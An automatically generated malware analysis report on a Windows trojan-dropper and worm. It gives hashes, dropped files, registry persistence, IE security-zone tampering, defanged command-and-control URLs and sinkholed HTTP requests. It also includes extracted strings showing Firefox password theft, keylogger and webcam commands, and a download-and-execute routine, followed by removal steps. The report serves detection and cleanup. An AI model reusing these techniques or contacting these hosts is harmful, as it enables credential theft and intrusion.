Generic.Palevo.4.B16E9B30_baded12134
Trojan-Dropper.Win32.Agent.zuz (Kaspersky), Generic.Palevo.4.B16E9B30 (B) (Emsisoft), Generic.Palevo.4.B16E9B30 (AdAware), GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: baded12134e3e146644f0b7ba7ef7bbe
SHA1: 74d57a3aa20db240a5f75a7e605a98bbf5931ebd
SHA256: 12f31cdfb88ab5483a0c4b2f0dfa30f0b1a06ffe3e9e0c7c5c7a0849d09e616a
SSDeep: 6144:DlrtwKs6FpaPyP8 YC3GPQhm7gQa9UQty:RyJPyNz2xp
Size: 232448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Generic creates the following process(es):
Host Booter bot.exe:1676
bot.exe:576
%original file name%.exe:196
The Generic injects its code into the following process(es):
Xr HoSt BooTer.exe:1704
iexplore.exe:1052
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Xr HoSt BooTer.exe:1704 makes changes in the file system.
The Generic creates and/or writes to the following file(s):
%System%\vcmgcd32.dll (1568 bytes)
%System%\vcmgcd32.dl_ (17 bytes)
%WinDir%\system.ini (78 bytes)
The Generic deletes the following file(s):
C:\KUKU300a (0 bytes)
The process bot.exe:576 makes changes in the file system.
The Generic creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe (601 bytes)
The process %original file name%.exe:196 makes changes in the file system.
The Generic creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Host Booter bot.exe (84 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Xr HoSt BooTer.exe (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bot.exe (125 bytes)
Registry activity
The process Host Booter bot.exe:1676 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 39 97 C8 37 EC 8B 28 8D D7 EF 3D D0 FD 2D"
[HKCU\Software\VeGaS iZ SiK Youtube1]
"FileNameAtual" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Host Booter bot.exe"
The process Xr HoSt BooTer.exe:1704 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC A0 0D F3 9A E7 F2 5F 99 5B 08 F6 A8 D7 19 38"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Generic deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process bot.exe:576 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B E8 D6 84 6B DD AD 93 4E 57 65 95 CE D1 F9 57"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Microsoft]
"svchost.exe" = "svchost"
The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe"
The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:196 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E CB 02 A4 CC 9A 82 ED 8B 92 96 81 F5 B4 90 96"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Xr HoSt BooTer.exe" = "Xr HoSt BooTer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Host Booter bot.exe" = "Host Booter bot"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"bot.exe" = "bot"
The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 49e17a08fde2dc17462f97194220a0d8 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\svchost.exe |
| 6ebf6e3875db3dfad9a85ebe2c2f98da | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Host Booter bot.exe |
| 558d0867bf4c786e1a0142188ab52773 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Xr HoSt BooTer.exe |
| 49e17a08fde2dc17462f97194220a0d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bot.exe |
| 5facec93ec966a2577075d44e2ba63c7 | c:\WINDOWS\system32\Cerberus\server.exe |
| ae22ca9f11ade8e362254b452cc07f78 | c:\WINDOWS\system32\vcmgcd32.dll |
| 3d0f7adfc75103a1902392c9fd39ed4f | c:\%original file name%.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 270336 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 274432 | 221184 | 217600 | 5.43823 | aa4e34921c6d21139b95027c2595f82d |
| .rsrc | 495616 | 24576 | 13824 | 3.25579 | 5a3e9955070a8ff7f774b88ddcb0c1a1 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.he3ns1k.info/mrow_pin/?id1398046enwbl8378&rnd=1410734 | |
| hxxp://www.he3ns1k.info/mrow_pin/?id1398046enwbl8378&rnd=1415500 | |
| hxxp://www.informat1onupd.info/mrow_pin/?id1398046enwbl8378&rnd=1420140 | |
| hxxp://www.g1ikdcvns3sdsal.info/mrow_pin/?id1398046enwbl8378&rnd=1415500 | |
| www.microsoft.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE Sality Virus User Agent Detected (KUKU)
ET TROJAN Known Sinkhole Response Header
Traffic
GET /mrow_pin/?id1398046enwbl8378&rnd=1415500 HTTP/1.1
User-Agent: KUKU v3.09 exp
Host: VVV.g1ikdcvns3sdsal.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 22:22:15 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/htmlHTTP/1.1 200 OK..Date: Wed, 15 Apr 2015 22:22:15 GMT..Server: Apache/2
.2.20 (Ubuntu)..X-Sinkhole: malware-sinkhole..Vary: Accept-Encoding..C
ontent-Length: 0..Content-Type: text/html..
GET /mrow_pin/?id1398046enwbl8378&rnd=1410734 HTTP/1.1
User-Agent: KUKU v3.09 exp
Host: VVV.he3ns1k.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 22:22:10 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/htmlHTTP/1.1 200 OK..Date: Wed, 15 Apr 2015 22:22:10 GMT..Server: Apache/2
.2.20 (Ubuntu)..X-Sinkhole: malware-sinkhole..Vary: Accept-Encoding..C
ontent-Length: 0..Content-Type: text/html..
The Generic connects to the servers at the folowing location(s):
.text
.data
.rsrc
@.rdata
MSVBVM60.DLL
!"3"2"2''(
Gh.AJ
MSComctlLib.StatusBar
MSComctlLib.ProgressBar
Port!
MSComctlLib.ListView
(7),01444
'9=82<.342
MSWinsockLib.Winsock
PoRT
MSWINSCK.OCX
mscomctl.ocx
%WinDir%\System32\MSWINSCK.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\SpliT Productions\FPD By SpliT\mscomctl.oca
VBA6.DLL
%System%\vcmgcd32.dll
\vcmgcd32.dl_
Win32.HLLP.Kuku v3.09 stub=->KERNEL32
.reloc
NEL32.dl
;@") '/(
D2.KB99
LL5Ad%s%d
.%c%s
0<5<;<@<
5&6_ 647
@,000408
(2,20242
*\A%Documents and Settings%\Ash.ASH-46SWIJD8EAP\Desktop\projects\Visual Basic\X-R Host Boot\Project1.vbp
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
9368265E-85FE-11d1-8BE3-0000F8754DA1
Port
HTTP-
PORTFLOOD-
A*\A%Documents and Settings%\Ash.ASH-46SWIJD8EAP\Desktop\projects\Visual Basic\X-R Host Boot\Project1.vbp
Host Booter 2.exe
Xr HoSt BooTer.exe_1704_rwx_00401000_00001000:
!"3"2"2''(
Xr HoSt BooTer.exe_1704_rwx_00430000_00005000:
%System%\vcmgcd32.dll
\vcmgcd32.dl_
Win32.HLLP.Kuku v3.09 stub=->KERNEL32
.reloc
NEL32.dl
;@") '/(
D2.KB99
LL5Ad%s%d
.%c%s
0<5<;<@<
5&6_ 647
@,000408
(2,20242
iexplore.exe_1052:
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
iexplore.exe_1052_rwx_00150000_00001000:
KERNEL32.DLL
iexplore.exe_1052_rwx_00290000_00001000:
KERNEL32.DLL
iexplore.exe_1052_rwx_002D0000_00001000:
KERNEL32.DLL
svchost.exe_664:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
SQL error or missing database
An internal logic error in SQLite
Operation terminated by sqlite3_interrupt()
Uses OS features not supported on host
2nd parameter to sqlite3_bind out of range
sqlite3_step() has another row ready
sqlite3_step() has finished executing
Unknown SQLite Error Code "
ESQLiteException
TSQLiteDatabaselHA
TSQLiteTable
sqlite3_open
sqlite3_errmsg
sqlite3_free
sqlite3_close
sqlite3_last_insert_rowid
sqlite3_total_changes
sqlite3_errcode
sqlite3_bind_text
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_double
sqlite3_bind_null
sqlite3_bind_blob
sqlite3_prepare_v2
sqlite3_step
sqlite3_reset
sqlite3_finalize
sqlite3_prepare
sqlite3_busy_timeout
sqlite3_libversion
sqlite3_create_collation
sqlite3_bind_parameter_index
sqlite3_changes
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_column_type
sqlite3_column_int64
sqlite3_column_double
sqlite3_column_bytes
sqlite3_column_blob
sqlite3_column_text
Failed to open database "%s" : %s
Failed to open database "%s" : unknown error
Error [%d]: %s.
"%s": %s
Error executing SQL
Could not prepare SQL statement
Error executing SQL statement
SQLite is Busy
udprec
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
:\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
\Mozilla Firefox\
nss3.dll
mozcrt19.dll
sqlite3.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
softokn3.dll
PK11_GetInternalKeySlot
userenv.dll
\Mozilla\Firefox\
profiles.ini
\signons3.txt
\Mozilla\Firefox\profiles.ini
signons.sqlite
SELECT * FROM moz_logins
encryptedPassword
Urlmon.dll
Shell32.dll
URLDownloadToFileA
ShellExecuteA
Future Windows version (unknown)
Windows
MSGBOX
UDPStart|
SOFTWARE\Mozilla\Mozilla Firefox\
WEBDL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
svchost.exe
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
GetCPInfo
wsock32.dll
shell32.dll
SQLite3
KWindows
UrlMon
SQLiteTable3
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point valueI/O error %d
Integer overflow Invalid floating point operation
iexplore.exe_1052_rwx_00310000_00001000:
KERNEL32.DLL
iexplore.exe_1052_rwx_00350000_00001000:
KERNEL32.DLL
iexplore.exe_1052_rwx_00390000_00001000:
KERNEL32.DLL
iexplore.exe_1052_rwx_00C40000_00001000:
advapi32.dll
iexplore.exe_1052_rwx_00D80000_00001000:
advapi32.dll
iexplore.exe_1052_rwx_00DB0000_00001000:
crypt32.dll
iexplore.exe_1052_rwx_00EF0000_00001000:
crypt32.dll
iexplore.exe_1052_rwx_00F20000_00001000:
gdi32.dll
iexplore.exe_1052_rwx_01060000_00001000:
gdi32.dll
iexplore.exe_1052_rwx_01090000_00001000:
ntdll.dll
iexplore.exe_1052_rwx_011D0000_00001000:
ntdll.dll
iexplore.exe_1052_rwx_01200000_00001000:
ole32.dll
iexplore.exe_1052_rwx_01340000_00001000:
ole32.dll
iexplore.exe_1052_rwx_01370000_00001000:
oleaut32.dll
iexplore.exe_1052_rwx_014B0000_00001000:
oleaut32.dll
iexplore.exe_1052_rwx_014E0000_00001000:
pstorec.dll
iexplore.exe_1052_rwx_01620000_00001000:
pstorec.dll
iexplore.exe_1052_rwx_01650000_00001000:
rasapi32.dll
iexplore.exe_1052_rwx_01790000_00001000:
rasapi32.dll
iexplore.exe_1052_rwx_017C0000_00001000:
shell32.dll
iexplore.exe_1052_rwx_01910000_00001000:
shell32.dll
iexplore.exe_1052_rwx_01940000_00001000:
user32.dll
iexplore.exe_1052_rwx_01980000_00001000:
user32.dll
iexplore.exe_1052_rwx_019B0000_00001000:
wsock32.dll
iexplore.exe_1052_rwx_019F0000_00001000:
wsock32.dll
iexplore.exe_1052_rwx_10410000_00036000:
`.rsrc
Portions Copyright (c) 1999,2003 Avenger by NhT
%s -- %s
SHFileOperationA
shell32.dll
URLDownloadToFileA
urlmon.dll
AVICAP32.dll
ntdll.dll
http\shell\open\command
\Internet Explorer\iexplore.exe
kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
ShellExecuteA
SOFTWARE\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
####@####
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
ReadTCPTable
ReadUdpTable
CloseTcpConnect
dllpass
StartTransferWebcam
StopTransferWebcam
CarregarVariaveisWebCam
WindowsExit
LowLevelKeybdHookProc
CarregarVariaveisWindows
teste.vbs
teste.txt
Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)Set objFileSystem = CreateObject("Scripting.fileSystemObject")Set objFile = objFileSystem.CreateTextFile("Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter
Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter
objFile.WriteLine(Info)
objFile.Close
cscript.exe
Windows NT 4.0
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows 7
Windows 95
Windows 98
Windows Me
Cerberus_LOG.txt
Cerberus Keylogger
] ---> [
Password
UnitPasswords
advapi32.dll
WindowsLive:name=*
xxxyyyzzz.dat
\Mozilla Firefox\
mozcrt19.dll
sqlite3.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
userenv.dll
\Mozilla\Firefox\
profiles.ini
\signons3.txt
\signons2.txt
\signons1.txt
\signons.txt
(unnamed password)
uURLHistory
Password:
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
RAS Passwords |
1.1.1.1
0.0.0.0
LogErros_server.txt
windowslistar
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
FirstExecution
getpassword|getmsn|
getpassword|getfirefox|
getpassword|getras|
getpassword|getie|
getpassword|getnoip|
openweb
getpassword
windowsmanager|mensagens|
windowsmanager|windowslistar|
windowsfechar
windowsmax
windowsmin
windowsmostrar
windowsocultar
windowsmintodas
windowscaption
xxyyzz.dat
xyzxyz.dat
keyloggersituacao
keylogger|keyloggersituacao|keyloggerativar|
keylogger|keyloggersituacao|keyloggerdesativar|
keyloggerativar
keyloggerdesativar
keyloggerdeletar
keyloggerenviar
keylogger|mensagens|zero|
keylogger
keyloggerenviar|
remotewebcamenviar
remotewebcamparar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
listarportasdns
portasativas|mensagens|
portasativas|listarportas|
listarportas
(##()@@ (##()@@ (##()@@
Config.Cerberus
%SYS%
ÞSKTOP%
plugin.dat
logs.dat
?456789:;<=
!"#$%&'()* ,-./0123
####@####
####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@####
####@#### ####@#### ####@####
####@#### ####@####
KWindows
UnitExecuteCommand
IEpasswords
KuURLHistory
UnitKeylogger
WinExec
SetNamedPipeHandleState
GetProcessHeap
CreatePipe
RegOpenKeyExA
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyA
RegCloseKey
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyboardState
GetKeyState
GetAsyncKeyState
5&&&-&
.idata
.reloc
P.rsrc
.melRBy
]~c.gD
.id\I7v
KERNEL32.DLL
crypt32.dll
gdi32.dll
ole32.dll
oleaut32.dll
pstorec.dll
user32.dll
wsock32.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Host Booter bot.exe:1676
bot.exe:576
%original file name%.exe:196 - Delete the original Generic file.
- Delete or disinfect the following files created/modified by the Generic:
%System%\vcmgcd32.dll (1568 bytes)
%System%\vcmgcd32.dl_ (17 bytes)
%WinDir%\system.ini (78 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Host Booter bot.exe (84 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Xr HoSt BooTer.exe (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bot.exe (125 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.